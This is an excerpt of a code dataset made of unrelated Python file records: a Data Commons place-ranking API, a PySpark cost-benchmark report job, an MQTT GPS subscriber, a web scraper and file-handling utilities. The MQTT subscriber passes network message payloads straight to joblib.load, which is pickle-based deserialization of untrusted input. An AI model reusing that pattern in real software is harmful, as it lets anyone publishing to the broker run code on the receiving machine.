y_spread,\n        'down': down - margin * y_spread,\n        'coordinateSequenceSet': coordinate_sequence_set\n    }\n    return Response(json.dumps(result), 200, mimetype='application/json')\n\n\n@cache.memoize(timeout=3600 * 24)  # Cache for one day.\ndef get_related_place(dcid,\n                      stats_vars_string,\n                      within_place=None,\n                      is_per_capita=None):\n    stats_vars = stats_vars_string.split('^')\n\n    return dc.get_related_place(dcid,\n                                stats_vars,\n                                within_place=within_place,\n                                is_per_capita=is_per_capita)\n\n\ndef get_ranking_url(containing_dcid,\n                    place_type,\n                    stat_var,\n                    highlight_dcid,\n                    is_per_capita=False):\n    url = url_for(\n        'ranking.ranking',\n        stat_var=stat_var,\n        place_type=place_type,\n        place_dcid=containing_dcid,\n        h=highlight_dcid,\n    )\n    if is_per_capita:\n        url = url + \"&pc\"\n    return url\n\n\n@cache.cached(timeout=3600 * 24, query_string=True)  # Cache for one day.\n@bp.route('/ranking/<path:dcid>')\ndef api_ranking(dcid):\n    \"\"\"\n    Get the ranking information for a given place.\n    \"\"\"\n    current_place_type = get_place_type(dcid)\n    parents = parent_places(dcid)[dcid]\n    parents_str = '^'.join(sorted(map(lambda x: x['dcid'], parents)))\n    parent_i18n_names = cached_i18n_name(parents_str, g.locale, False)\n\n    selected_parents = []\n    parent_names = {}\n    for parent in parents:\n        parent_dcid = parent['dcid']\n        parent_types = parent['types'][0]\n        if parent_types == 'Continent':\n            continue\n        if parent_dcid.startswith('zip'):\n            continue\n        selected_parents.append(parent_dcid)\n        i18n_name = parent_i18n_names[parent_dcid]\n        parent_names[parent_dcid] = i18n_name if i18n_name else parent.get(\n            'name', \"\")\n        if len(selected_parents) == 3:\n            break\n    result = collections.defaultdict(list)\n\n    # Contains statistical variable and the display name used for place rankings.\n    ranking_stats = {\n        # TRANSLATORS: Label for rankings of places by size of population (sorted from highest to lowest).\n        'Count_Person': gettext('Largest Population'),\n        # TRANSLATORS: Label for rankings of median individual income (sorted from highest to lowest).\n        'Median_Income_Person': gettext('Highest Median Income'),\n        # TRANSLATORS: Label for rankings of places by the median age of its population (sorted from highest to lowest).\n        'Median_Age_Person': gettext('Highest Median Age'),\n        # TRANSLATORS: Label for rankings of places by the unemployment rate of its population (sorted from highest to lowest).\n        'UnemploymentRate_Person': gettext('Highest Unemployment Rate'),\n    }\n    # Crime stats var is separated from RANKING_STATS as it uses 
perCapita\n    # option.\n    # TODO(shifucun): merge this once https://github.com/datacommonsorg/mixer/issues/262 is fixed.\n    crime_statsvar = {\n        'Count_CriminalActivities_CombinedCrime':  # TRANSLATORS: Label for rankings of places by the number of combined criminal activities, per capita (sorted from highest to lowest).\n            gettext('Highest Crime Per Capita')\n    }\n    for parent_dcid in selected_parents:\n        stats_var_string = '^'.join(ranking_stats.keys())\n        response = get_related_place(dcid,\n                                     stats_var_string,\n                                     within_place=parent_dcid)\n        for stats_var, data in response.items():\n            result[ranking_stats[stats_var]].append({\n                'name':\n                    parent_names[parent_dcid],\n                'data':\n                    data,\n                'rankingUrl':\n                    get_ranking_url(parent_dcid, current_place_type, stats_var,\n                                    dcid)\n            })\n        response = get_related_place(dcid,\n                                     '^'.join(crime_statsvar.keys()),\n                                     within_place=parent_dcid,\n                                     is_per_capita=True)\n        for stats_var, data in response.items():\n            result[crime_statsvar[stats_var]].append({\n                'name':\n                    parent_names[parent_dcid],\n                'data':\n                    data,\n                'rankingUrl':\n                    get_ranking_url(parent_dcid,\n                                    current_place_type,\n                                    stats_var,\n                                    dcid,\n                                    is_per_capita=True)\n            })\n\n    all_labels = list(ranking_stats.values()) + \\\n        list(crime_statsvar.values())\n    for label in all_labels:\n        if label in result:\n            result[label] = [x for x in result[label] if 'data' in x]\n    result['label'] = [x for x in all_labels if x in result]\n    return Response(json.dumps(result), 200, mimetype='application/json')\n\n\n@cache.memoize(timeout=3600 * 24)  # Cache for one day.\ndef get_state_code(dcids):\n    \"\"\"Get state codes for a list of places that are state equivalents\n\n    Args:\n        dcids: ^ separated string of dcids of places that are state equivalents\n\n    Returns:\n        A dictionary of state codes, keyed by dcid\n    \"\"\"\n    result = {}\n    if not dcids:\n        return result\n    dcids = dcids.split('^')\n    iso_codes = dc.get_property_values(dcids, 'isoCode', True)\n\n    for dcid in dcids:\n        state_code = None\n        iso_code = iso_codes[dcid]\n        if iso_code:\n            split_iso_code = iso_code[0].split(\"-\")\n            if len(split_iso_code\n                  ) > 1 and split_iso_code[0] == US_ISO_CODE_PREFIX:\n                state_code = split_iso_code[1]\n        result[dcid] = state_code\n\n    return result\n\n\n@cache.memoize(timeout=3600 * 24)  # Cache for one day.\ndef get_display_name(dcids, locale=\"en\"):\n    \"\"\" Get display names for a list of places. Display name is place name with state code\n    if it has a parent place that is a state.\n\n    Args:\n        dcids: ^ separated string of dcids. 
It must be a single string for the cache.\n locale: the desired localization language code.\n\n Returns:\n A dictionary of display names, keyed by dcid.\n \"\"\"\n place_names = cached_i18n_name(dcids, locale, True)\n parents = parent_places(dcids)\n dcids = dcids.split('^')\n result = {}\n dcid_state_mapping = {}\n for dcid in dcids:\n for parent_place in parents[dcid]:\n parent_dcid = parent_place['dcid']\n place_types = parent_place['types']\n for place_type in place_types:\n if place_type in STATE_EQUIVALENTS:\n dcid_state_mapping[dcid] = parent_dcid\n break\n result[dcid] = place_names[dcid]\n\n states_lookup = '^'.join(sorted(set(dcid_state_mapping.values())))\n if locale == \"en\":\n state_codes = get_state_code(states_lookup)\n else:\n state_codes = cached_i18n_name(states_lookup, locale, True)\n for dcid in dcid_state_mapping.keys():\n state_code = state_codes[dcid_state_mapping[dcid]]\n if state_code:\n result[dcid] = result[dcid] + ', ' + state_code\n return result\n\n\n@bp.route('/displayname')\ndef api_display_name():\n \"\"\"\n Get display names for a list of places.\n \"\"\"\n dcids = request.args.getlist('dcid')\n result = get_display_name('^'.join((sorted(dcids))), g.locale)\n return Response(json.dumps(result), 200, mimetype='application/json')\n\n\n@bp.route('/places-in')\n@cache.cached(timeout=3600 * 24, query_string=True) # Cache for one day.\ndef get_places_in():\n \"\"\"Gets DCIDs of places of a certain type contained in some places.\n\n Sends the request to the Data Commons \"/node/places-in\" API.\n See https://docs.datacommons.org/api/rest/place_in.html.\n\n Returns:\n Dict keyed by parent DCIDs with lists of child place DCIDs as values.\n \"\"\"\n dcids = request.args.getlist(\"dcid\")\n place_type = request.args.get(\"placeType\")\n return Response(json.dumps(dc.get_places_in(dcids, place_type)),\n 200,\n mimetype='application/json')\n\n\n@bp.route('/places-in-names')\n@cache.cached(timeout=3600 * 24, query_string=True) # Cache for one day.\ndef get_places_in_names():\n \"\"\"Gets names of places of a certain type contained in a place.\n\n Returns:\n Dicts keyed by child place DCIDs with their names as values.\n \"\"\"\n dcid = request.args.get(\"dcid\")\n place_type = request.args.get(\"placeType\")\n child_places = dc.get_places_in([dcid], place_type)[dcid]\n return Response(json.dumps(get_name(child_places)),\n 200,\n mimetype='application/json')\n","sub_path":"server/routes/api/place.py","file_name":"place.py","file_ext":"py","file_size_in_byte":24104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"397771512","text":"import sys\r\nfrom pyspark import SparkConf\r\nfrom pyspark.sql import SparkSession\r\nfrom pyspark.sql.types import *\r\nfrom pyspark.sql import functions as F\r\n\r\nlocation = 'gs://data-discovery/projects/cost_benchmark/phase_3/'\r\n\r\n# Customer Input Type: can be either 1, 2, or 3, corresponding to upload list of customers, upload list of hierarchies, and customer attribute selection, respectively\r\ncustomer_option = sys.argv[1]\r\n\r\n# List of customer attributes for filtering eligibility files as an alternative to uploading a customer file.\r\ncustomer_attributes = sys.argv[2].split('|')\r\n\r\n# Type of customer eligibilities to include: must be a string of 4 digits, each is either 1 or 0, representing whether or not to include that type of eligibility\r\neligibility_options = sys.argv[3]\r\n\r\n# Which reports to include: must be a string of 4 digits, each is either 1 or 0, 
representing whether or not to include that report\r\nreport_options = sys.argv[4]\r\n\r\n# Name of the customer or hierarchy file that is uploaded to Google Cloud Storage folder (gs://data-discovery/projects/cost_benchmark/phase_3/input_files/)\r\ncustomer_file = sys.argv[5]\r\n\r\n# Name of the material file that is uploaded to Google Cloud Storage folder (gs://data-discovery/projects/cost_benchmark/phase_3/input_files/)\r\nmaterial_file = sys.argv[6]\r\n\r\n# Name of the unique Project ID\r\nproject_id = sys.argv[7]\r\n\r\nprint(sys.argv)\r\n\r\n# Declare a SparkSession\r\nconf = SparkConf()\r\nspark = SparkSession.builder.enableHiveSupport().getOrCreate()\r\n\r\ndef create_customer_attributes_dict(customer_attributes_list):\r\n\toutput = {'vertical_market': [],'customer_market': [],'customer_submarket': [],'cot': [],'district': [],'zone': [],'sales_office': [] }\r\n\tprint(customer_attributes_list)\r\n\tfor item in customer_attributes_list:\r\n\t\titem = item.split(':')\r\n\t\r\n\t\toutput[item[0]].append(item[1])\r\n\treturn output\r\n\r\ndef filter_by_attributes(eligibility_list, customer_attributes_dict):\r\n\tprint(customer_attributes_dict)\r\n\t\r\n\toutput_df = (eligibility_list\r\n\t\t.filter(eligibility_list['sales_office_vkbur'].isin(customer_attributes_dict['sales_office']))\r\n\t\t.filter(eligibility_list['vertical_mkt_desc'].isin(customer_attributes_dict['vertical_market']))\r\n\t\t.filter(eligibility_list['customer_market_description'].isin(customer_attributes_dict['customer_market']))\r\n\t\t.filter(eligibility_list['customer_submarket_description'].isin(customer_attributes_dict['customer_submarket']))\r\n\t\t.filter(eligibility_list['cot_desc'].isin(customer_attributes_dict['cot']))\r\n\t\t.filter(eligibility_list['district_name_bztxt'].isin(customer_attributes_dict['district']))\r\n\t\t.filter(eligibility_list['zone_zzone'].isin(customer_attributes_dict['zone']))\r\n\t\t.drop('vertical_mkt_desc')\r\n\t\t.drop('customer_market_description')\r\n\t\t.drop('customer_submarket_description')\r\n\t\t.drop('cot_desc')\r\n\t\t.drop('district_name_bztxt')\r\n\t\t)\r\n\treturn output_df\r\n\r\ndef filter_by_customer_eligibility(customer_eligibility):\r\n\tpossible_options = ['Customer','Hierarchy','COT/District','COT/Sales Office']\r\n\tselected_options = []\r\n\tfor x in range(4):\r\n\t\tif eligibility_options[x] == '1':\r\n\t\t\tselected_options.append(possible_options[x])\r\n\treturn customer_eligibility.filter(customer_eligibility.customer_eligibility_type.isin(selected_options))\r\n\r\ndef generate_material_summary(long_report, material_list):\r\n\t\"\"\"\r\n\tAggregates the raw SPA report to a material level, finds min, avg, and max SPA costs, adds into-stock costs from MBEW, and descriptive columns from descriptions table\r\n\t\"\"\"\r\n\tselected_locations = long_report.groupby('delivering_plant_vwerk').count().drop('count')\r\n\r\n\tmbew = spark.read.parquet(location + 'extracts/stock_cost_table')\r\n\tmbew_filtered = mbew.join(selected_locations, mbew.plant_werks == selected_locations.delivering_plant_vwerk, 'inner')\r\n\r\n\tdescriptions = spark.read.parquet(location + 'extracts/material_description_table')\r\n\tfiltered_descriptions = material_list.join(descriptions, \"material_matnr\", 'left_outer')\r\n\r\n\t#Standardize the 'pricing_unit_kpein' (UOM) field so that there is only one UOM for each material, and then find min, avg, max SPA costs\r\n\t#This UOM standardization process can possibly be moved to material_eligibility_etl.py to reduce job run 
time.\r\n\ttemp_table = long_report.groupby('material_matnr','pricing_unit_kpein').count()\r\n\ttemp_table2 = temp_table.groupby('material_matnr').max('count')\r\n\ttemp_table3 = temp_table.join(temp_table2, 'material_matnr')\r\n\tcommon_per_table = temp_table3.filter(temp_table3['count'] == temp_table3['max(count)']).groupby('material_matnr').max('pricing_unit_kpein').select(F.col('max(pricing_unit_kpein)').alias('common_per_SPA'), 'material_matnr')\r\n\t# Add the new standardized common per back into the long report\r\n\tlong_report_common_per = long_report.join(common_per_table, 'material_matnr')\r\n\tlong_report_common_per = long_report_common_per.withColumn('net_rate', long_report_common_per['net_rate'] / long_report_common_per['pricing_unit_kpein'] * long_report_common_per['common_per_SPA'])\r\n\t# Find min, average, and max net rates plus distinct deal and rate counts\r\n\tagg_report = long_report_common_per.groupby('material_matnr','common_per_SPA').agg(F.countDistinct('sales_deal_knumaag'), F.min('net_rate'), F.avg('net_rate'), F.max('net_rate'), F.countDistinct('net_rate'))\r\n\tagg_report_and_desc = filtered_descriptions.join(agg_report, 'material_matnr', 'left_outer')\r\n\tstock_costs = material_list.select('material_matnr').join(mbew_filtered, 'material_matnr').groupby('material_matnr', 'common_per_stock').agg(F.min('standard_price_stprs'), F.avg('standard_price_stprs'), F.max('standard_price_stprs'))\r\n\tmaterial_summary_report = agg_report_and_desc.join(stock_costs, 'material_matnr', 'left_outer')\r\n\r\n\tcolumn_order = ['material_matnr',\r\n\t\t'supplier_name',\r\n\t\t'supplier_num',\r\n\t\t'supplier_status',\r\n\t\t'product_hierarchy',\r\n\t\t'vendor_hierarchy_1',\r\n\t\t'vendor_hierarchy_2',\r\n\t\t'vendor_hierarchy_3',\r\n\t\t'mfrpn',\r\n\t\t'mfrpn_abbreviated',\r\n\t\t'material_desc',\r\n\t\t'material_grp_desc',\r\n\t\t'material_grp_num',\r\n\t\t'material_type',\r\n\t\t'natl_dno_code',\r\n\t\t't3_cost',\r\n\t\t'l_cost',\r\n\t\t'a_cost',\r\n\t\t'b_cost',\r\n\t\t'sd_cost',\r\n\t\t'natl_net_cost',\r\n\t\t'slab_uom',\r\n\t\t'min(standard_price_stprs)',\r\n\t\t'avg(standard_price_stprs)',\r\n\t\t'max(standard_price_stprs)',\r\n\t\t'common_per_stock',\r\n\t\t'top_item',\r\n\t\t'upc',\r\n\t\t'count(DISTINCT sales_deal_knumaag)',\r\n\t\t'count(DISTINCT net_rate)',\r\n\t\t'min(net_rate)',\r\n\t\t'avg(net_rate)',\r\n\t\t'max(net_rate)',\r\n\t\t'common_per_SPA']\r\n\tmaterial_summary_report = material_summary_report.select(*column_order)\r\n\r\n\treturn material_summary_report\r\n\r\ndef generate_customer_report(long_report):\r\n\t\"\"\"\r\n\tAggregates the raw SPA report to a customer level and adds some additional customer data\r\n\t\"\"\"\r\n\tagg_report = long_report.groupby('customer_kunnr','sales_office_vkbur','customer_classific_kukla','customer_market_zzmarket','customer_submarket_zzsubmarket','delivering_plant_vwerk','name_name1','sales_district_bzirk','vertical_mkt_attrib_zzbran6').count().drop('count')\r\n\tvalues_location = location + 'extracts/'\r\n\tvalues_schema = StructType([\r\n\t\tStructField('name',StringType(),True),\r\n\t\tStructField('value',StringType(),True)])\r\n\tcot_values = spark.read.schema(values_schema).csv(values_location + 'cot_values.csv')\r\n\tvertical_mkt_values = spark.read.schema(values_schema).csv(values_location + 'vertical_mkt_values.csv')\r\n\tcustomer_mkt_values = spark.read.schema(values_schema).csv(values_location + 'customer_mkt_values.csv')\r\n\tcustomer_submkt_values = spark.read.schema(values_schema).csv(values_location + 'customer_submkt_values.csv')\r\n\tdistrict_values = 
spark.read.schema(values_schema).csv(values_location + 'district_values.csv')\r\n\tagg_report = agg_report.join(cot_values.withColumnRenamed('name','class_of_trade'), agg_report.customer_classific_kukla == cot_values.value, 'left_outer').drop('value')\r\n\tagg_report = agg_report.join(vertical_mkt_values.withColumnRenamed('name','vertical_market'), agg_report.vertical_mkt_attrib_zzbran6 == vertical_mkt_values.value, 'left_outer').drop('value')\r\n\tagg_report = agg_report.join(customer_mkt_values.withColumnRenamed('name','customer_market'), agg_report.customer_market_zzmarket == customer_mkt_values.value, 'left_outer').drop('value')\r\n\tagg_report = agg_report.join(customer_submkt_values.withColumnRenamed('name','customer_submarket'), agg_report.customer_submarket_zzsubmarket == customer_submkt_values.value, 'left_outer').drop('value')\r\n\tagg_report = agg_report.join(district_values.withColumnRenamed('name','district'), agg_report.sales_district_bzirk == district_values.value, 'left_outer').drop('value')\r\n\tcustomer_report = agg_report.drop('sales_district_bzirk','customer_submarket_zzsubmarket','customer_classific_kukla','vertical_mkt_attrib_zzbran6','customer_market_zzmarket')\r\n\treturn customer_report\r\n\r\ndef generate_material_agreement_report(long_report):\r\n\t\"\"\"\r\n\tAggregates the raw SPA report to an agreement level (omits the customer field)\r\n\t\"\"\"\r\n\treturn long_report.groupby('condition_type_desc',\r\n\t\t'condition_type_kschl',\r\n\t\t'eligibility_type',\r\n\t\t'description_botext',\r\n\t\t'external_description_abrex',\r\n\t\t'material_matnr',\r\n\t\t'valid_from_datab',\r\n\t\t'valid_to_datbi',\r\n\t\t'percentage',\r\n\t\t'price',\r\n\t\t'price_list_pltypd',\r\n\t\t'pricing_unit_kpein',\r\n\t\t'sales_deal_knumaag',\r\n\t\t'net_rate').count().drop('count')\r\n\r\ndef generate_long_report(long_report):\r\n\t\"\"\"\r\n\tRenames the fields of the raw long report so that it is ready for consumption\r\n\t\"\"\"\r\n\tlong_report = long_report.selectExpr('condition_type_desc as condition_type_description',\r\n\t\t'condition_type_kschl as condition_type',\r\n\t\t'customer_kunnr as customer_number',\r\n\t\t'eligibility_type',\r\n\t\t'material_matnr as material_number',\r\n\t\t'valid_from_datab',\r\n\t\t'valid_to_datbi',\r\n\t\t'net_rate as spa_rate',\r\n\t\t'percentage as percent_discount',\r\n\t\t'price',\r\n\t\t'price_list_pltypd as price_list',\r\n\t\t'pricing_unit_kpein as uom',\r\n\t\t'sales_deal_knumaag as agreement_number',\r\n\t\t'external_description_abrex as external_description',\r\n\t\t'description_botext as description')\r\n\treturn long_report\r\n\r\ndef generate_customers_from_hierarchies(hierarchy_list):\r\n\t\"\"\"\r\n\tAccepts a list of hierarchy numbers and returns a list of customer numbers\r\n\t\"\"\"\r\n\thierarchy_list = hierarchy_list.withColumnRenamed('_c0','input_lvl_1')\r\n\thierarchy_list = hierarchy_list.withColumn('input_lvl_1', F.lpad(hierarchy_list['input_lvl_1'],10,'0'))\r\n\r\n\tpricing_hierarchy = spark.read.parquet(location + 'extracts/pricing_hierarchy_table')\r\n\r\n\thierarchy_list = (hierarchy_list.join(pricing_hierarchy, hierarchy_list.input_lvl_1 == pricing_hierarchy.higherlevel_customer_hkunnr, 'left_outer')\r\n\t\t.drop('higherlevel_customer_hkunnr'))\r\n\thierarchy_list = hierarchy_list.withColumnRenamed('customer_kunnr','input_lvl_2')\r\n\r\n\thierarchy_list = (hierarchy_list.join(pricing_hierarchy, hierarchy_list.input_lvl_2 == pricing_hierarchy.higherlevel_customer_hkunnr, 
'left_outer')\r\n\t\t.drop('higherlevel_customer_hkunnr'))\r\n\thierarchy_list = hierarchy_list.withColumnRenamed('customer_kunnr','input_lvl_3')\r\n\r\n\thierarchy_list = (hierarchy_list.join(pricing_hierarchy, hierarchy_list.input_lvl_3 == pricing_hierarchy.higherlevel_customer_hkunnr, 'left_outer')\r\n\t\t.drop('higherlevel_customer_hkunnr'))\r\n\thierarchy_list = hierarchy_list.withColumnRenamed('customer_kunnr','input_lvl_4')\r\n\r\n\thierarchy_list = (hierarchy_list.join(pricing_hierarchy, hierarchy_list.input_lvl_4 == pricing_hierarchy.higherlevel_customer_hkunnr, 'left_outer')\r\n\t\t.drop('higherlevel_customer_hkunnr'))\r\n\thierarchy_list = hierarchy_list.withColumnRenamed('customer_kunnr','input_lvl_5')\r\n\r\n\r\n\r\n\tdef pick_highest_hierarchy(input_1,input_2,input_3,input_4,input_5):\r\n\t\tif(input_5):\r\n\t\t\treturn input_5\r\n\t\telif(input_4):\r\n\t\t\treturn input_4\r\n\t\telif(input_3):\r\n\t\t\treturn input_3\r\n\t\telif(input_2):\r\n\t\t\treturn input_2\r\n\t\telse:\r\n\t\t\treturn input_1\r\n\thierarchy_selector_UDF = F.udf(pick_highest_hierarchy, StringType())\r\n\thierarchy_list = hierarchy_list.withColumn('customer_kunnr',hierarchy_selector_UDF(hierarchy_list.input_lvl_1, hierarchy_list.input_lvl_2, hierarchy_list.input_lvl_3, hierarchy_list.input_lvl_4, hierarchy_list.input_lvl_5))\r\n\t\r\n\treturn hierarchy_list.selectExpr('customer_kunnr as _c0')\r\n\r\n# Create a dataframe to hold the list of customers\r\nif(customer_option == '1'):\r\n\tcustomer_input = spark.read.csv(\"gs://data-discovery/\" + customer_file)\r\n\t\r\nelif(customer_option == '2'):\r\n\tcustomer_input = generate_customers_from_hierarchies(spark.read.csv(\"gs://data-discovery/\" + customer_file))\r\n\t\r\n\r\n# Combine all of the eligibility files into one dataframe\r\ncustomer_eligibility = filter_by_customer_eligibility(spark.read.parquet(location + 'eligibility_files/customer_eligibility_table'))\r\n\r\n\r\n# Filter the eligibility dataframe to the relevant customers\r\nif(customer_option == '1' or customer_option == '2'):\r\n\tpadded_customer_input = customer_input.withColumn('customer_kunnr', F.lpad(customer_input['_c0'],10,'0')).drop('_c0')\r\n\r\n\t\r\n\tcustomer_eligibility = (customer_eligibility\r\n\t\t.drop('vertical_mkt_desc')\r\n\t\t.drop('customer_market_description')\r\n\t\t.drop('customer_submarket_description')\r\n\t\t.drop('cot_desc')\r\n\t\t.drop('district_name_bztxt')\r\n\t\t)\r\n\r\n\tfiltered_eligibility = customer_eligibility.join(F.broadcast(padded_customer_input), 'customer_kunnr')\r\n\r\nelse:\r\n\tcustomer_attributes_dict = create_customer_attributes_dict(customer_attributes)\r\n\tfiltered_eligibility = filter_by_attributes(customer_eligibility, customer_attributes_dict)\r\n\r\n# Create a dataframe to hold the list of materials\r\nmaterial_input = spark.read.schema(StructType([\r\n\t\tStructField('material_matnr',StringType(),True)])).csv(\"gs://data-discovery/\" + material_file)\r\n\r\n# Add primary keys to material list\r\nmaterial_input_with_id = material_input.withColumn(\"id\", F.monotonically_increasing_id())\r\n\r\n#Create a dataframe to hold the material eligibility table\r\nmaterial_eligibility = spark.read.parquet(location + 'eligibility_files/material_eligibility_table')\r\n\r\n#Add leading zeros to material input file so it can join with material_eligibility table\r\nmaterial_input = material_input.withColumn(\"material_matnr\", F.lpad(material_input[\"material_matnr\"],18,\"0\"))\r\n\r\n#Filter eligibility files to the relevant 
materials\r\nfiltered_agreements = material_eligibility.join(F.broadcast(material_input), \"material_matnr\")\r\n\r\nlong_report = filtered_agreements.join(filtered_eligibility, \"sales_deal_knumaag\")\r\n\r\n\r\n# Based on user input, call the appropriate methods to generate each type of report\r\nif report_options[0] == '1':\r\n\tmaterial_summary = generate_material_summary(long_report, material_input)\r\n\r\n\tmaterial_summary.coalesce(32).write.csv(location + 'output_files/' + project_id + '_material_summary', mode=\"overwrite\", compression=\"none\")\r\n\r\nif report_options[1] == '1':\r\n\tcustomer_report = generate_customer_report(long_report)\r\n\t\r\n\tcustomer_report.coalesce(32).write.csv(location + 'output_files/' + project_id + '_customer_report', mode=\"overwrite\", compression=\"none\")\r\n\r\nif report_options[2] == '1':\r\n\tmaterial_agreement_report = generate_material_agreement_report(long_report)\r\n\t\r\n\tmaterial_agreement_report.coalesce(32).write.csv(location + 'output_files/' + project_id + '_material_agreement_report_condensed', mode=\"overwrite\", compression=\"none\")\r\n\r\nif report_options[3] == '1':\r\n\tlong_report_final = generate_long_report(long_report)\r\n\t\r\n\tlong_report_final.coalesce(32).write.csv(location + 'output_files/' + project_id + '_material_agreement_report_long', mode=\"overwrite\", compression=\"none\")\r\n\r\n","sub_path":"cost_benchmark_gcp.py","file_name":"cost_benchmark_gcp.py","file_ext":"py","file_size_in_byte":15402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"339362801","text":"import joblib\nimport datetime\nimport time\nimport json\nimport serial\nimport io\nimport paho.mqtt.client as mqtt\nfrom ubx import UBXManager\n\n\n\n\n\n\n# # 當地端程式連線伺服器得到回應時,要做的動作\n# def on_connect(client, userdata, flags, rc):\n# print(\"Connected with result code \"+str(rc))\n\n# # 將訂閱主題寫在on_connet中\n# # 如果我們失去連線或重新連線時\n# # 地端程式將會重新訂閱\n# client.subscribe(\"gps\")\n\n\ndef on_connect(client, userdata, flags, rc):\n print(\"Connected with result code \"+str(rc))\n\n # 將訂閱主題寫在on_connet中\n # 如果我們失去連線或重新連線時\n # 地端程式將會重新訂閱\n # client.subscribe(\"gps\")\n\n client.subscribe(\"gps/a0\")\n client.subscribe(\"gps/a1\")\n client.subscribe(\"gps/a2\")\n client.subscribe(\"gps/a3\")\n\n\ndef readGps(gpsQue):\n def on_message(client, userdata, msg):\n # print('msg:',msg.topic)\n bio = io.BytesIO(msg.payload)\n obj = joblib.load(bio)\n anchor_list = gpsQue[0]\n if msg.topic == \"gps/a0\":\n anchor_list[0] = obj\n gpsQue.append(anchor_list)\n # print(obj)\n \n\n client = mqtt.Client()\n client.on_connect = on_connect\n client.on_message = on_message\n client.connect(\"192.168.0.106\", 1883, 60)\n\n client.loop_forever()\n\n","sub_path":"tag/mqtt_sub.py","file_name":"mqtt_sub.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"230835426","text":"#!/usr/bin/env python\n# encoding: utf-8\n\n# ospath_dirname.py\nimport os.path\nPATHS = [\n '/one/two/three',\n '/one/two/three/',\n '/',\n '',\n]\nfor path in PATHS:\n print('{!r:>17}:{}'.format(path, os.path.dirname(path)))\n","sub_path":"TheFileSystem/ospath_dirname.py","file_name":"ospath_dirname.py","file_ext":"py","file_size_in_byte":230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"1839037","text":"from bs4 import BeautifulSoup\nimport re\nimport requests\nurl 
="http://www.reading.ac.uk/ready-to-study/study/subject-area/modern-languages-and-european-studies-ug/ba-spanish-and-history.aspx\"\nres = requests.get(url).text\nsoup = BeautifulSoup(res, 'lxml')\n\ncourse_data ={}\nfees_div = soup.find('div', class_='Fees hiddenContent pad-around-large tabcontent').find_all('p')\nprint(fees_div)\nfor d in fees_div:\n    print(d.text.split('students: ', 1)[-1].strip('* | '))\n\n\n    # course_data['Fees'] = fees_list\n    # print('fees : ', fees_list)\n","sub_path":"scrapy_projt/soup_scrapy/b_soup_view_source.py","file_name":"b_soup_view_source.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"523591092","text":"import os\r\nimport re\r\nimport shutil\r\n\r\nclass FileMoverToRoot(object):\r\n\r\n    def __init__(self, rp):\r\n        assert isinstance(rp, str)\r\n        self.__CONST_ROOT_PATH = rp\r\n        # structure -> key: original file name, value: list of the integer label values seen for it\r\n        self.__parsedFileNameDict = dict()\r\n        self.__CONST_LABEL_EXP = '(((\\([0-9]+\\))(\\..*)?))$'\r\n        self.__CONST_EXT_EXP = '(\\.[^.]+)$'\r\n\r\n    # Does the file name carry a label?\r\n    def __hasLabel(self, fn):\r\n        assert isinstance(fn, str)\r\n        p = re.compile(self.__CONST_LABEL_EXP)\r\n        ps = p.search(fn)\r\n        if ps is not None and ps.group(3):\r\n            #print('hasLabel called', p.search(fn).group(3))\r\n            return True\r\n        else:\r\n            #print('hasLabel return false')\r\n            return False\r\n\r\n    # Returns the position of the number inside the label:\r\n    # from the digits inside the parentheses up to the closing parenthesis\r\n    def __findLabelNumPos(self, fn):\r\n        assert isinstance(fn, str)\r\n        p = re.compile(self.__CONST_LABEL_EXP)\r\n        s = p.search(fn)\r\n        if s is not None:\r\n            # print('findLabelNumPos called', s.group(3))\r\n            return p.search(fn).start(3) + 1, p.search(fn).end(3) - 1\r\n        else:\r\n            # print('findLabelNumPos return none')\r\n            return None, None\r\n\r\n    # Returns the integer value stored in the label\r\n    def __getLabelNum(self, fn):\r\n        assert isinstance(fn, str)\r\n        if self.__hasLabel(fn):\r\n            lbns, lbne = self.__findLabelNumPos(fn)\r\n            return int(fn[lbns:lbne])\r\n        else:\r\n            return None\r\n\r\n    # Returns the position of the file extension\r\n    def __findExtPos(self, fn):\r\n        assert isinstance(fn, str)\r\n        p = re.compile(self.__CONST_EXT_EXP)\r\n        s = p.search(fn)\r\n        # print('findExtPos called', s)\r\n        if s is not None:\r\n            return p.search(fn).start()\r\n        else:\r\n            return None\r\n\r\n    # Does the file name have an extension?\r\n    def __hasExt(self, fn):\r\n        assert isinstance(fn, str)\r\n        p = re.compile(self.__CONST_EXT_EXP)\r\n        s = p.search(fn)\r\n        if s is None:\r\n            return False\r\n        else:\r\n            return True\r\n\r\n    # File-extension extractor\r\n    def __extractExt(self, fn):\r\n        assert isinstance(fn, str)\r\n        if self.__hasExt(fn):\r\n            # return os.path.splitext(fn)[-1]\r\n            return fn[self.__findExtPos(fn):]\r\n        else: return ''\r\n\r\n    # Returns the name with the label removed\r\n    def __uniqFileNameParser(self, fn):\r\n        assert isinstance(fn, str)\r\n        if not self.__hasLabel(fn):\r\n            return fn\r\n        else:\r\n            lbStartPos, lbEndPos = self.__findLabelNumPos(fn)\r\n            # print('uniqFileNameParser', fn[:lbStartPos - 1] + fn[lbEndPos + 1:])\r\n            return fn[:lbStartPos - 1] + fn[lbEndPos + 1:]\r\n\r\n    # Is the parsed file name a duplicate?\r\n    def __isDuplicatedName(self, pfn):\r\n        # self.__parsedFileNameDict = ['a','a.txt']\r\n        assert isinstance(pfn, str)\r\n        if pfn in self.__parsedFileNameDict:\r\n            return True\r\n        else:\r\n            return False\r\n\r\n
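    # Illustrative behaviour of the label helpers above (comments only, derived from the regexes):\r\n    #   'photo(3).txt' -> label number 3, de-labelled name 'photo.txt'\r\n    #   'notes(12)'    -> label number 12, de-labelled name 'notes'\r\n\r\n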
